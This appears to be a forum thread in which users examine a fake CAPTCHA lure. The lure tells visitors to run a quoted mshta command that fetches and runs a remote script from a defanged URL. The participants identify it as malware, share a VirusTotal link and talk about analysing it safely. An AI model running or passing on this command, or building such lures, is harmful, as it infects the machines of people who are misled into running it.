The text it wants me to run is the following:
mshta https://check/[dot]dasoc[dot]icu/gkcxv[dot]google?i=888x8x8x-x8xx-8888-xxx8-a00888888a1ab # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 552163’’
Looks like the site got hacked and wants be run malware, but I’ve never seen something like this before.
Yeah, doesn’t mshta run JavaScript locally on Windows? This looks like a way to force you to run their script
I hope that URL isn’t the real one, you don’t want anyone trying it just to see what would happen
I have no idea how somebody might come up with this braindead, unintuitive and irreproducable mnemonic for a JavaScript interpreter but it sounds very much like something Microsoft would do.
https://www.virustotal.com/gui/url/d735247640472ab4a405600193afdcfd3d3757d163f52d8a5a5dfa3176df58c3/detection
Possibly.
BTW, certain malware may be able to break out of a VM.
On the other, some malware may recognize that it is being run in a VM and do absolutely nothing to avoid analysis.
I’m sure proper malware analysts have dedicated non-virtual machines they can just format between tests.
Now I wonder if there are motherboards with easily re-flashable firmware (from a read-only device that couldn’t be tampered with).
I’m curious what the script does, I’d love to reverse engineer it but don’t want to risk accidentally executing anything. Anyone with a disposable VM care to take the risk?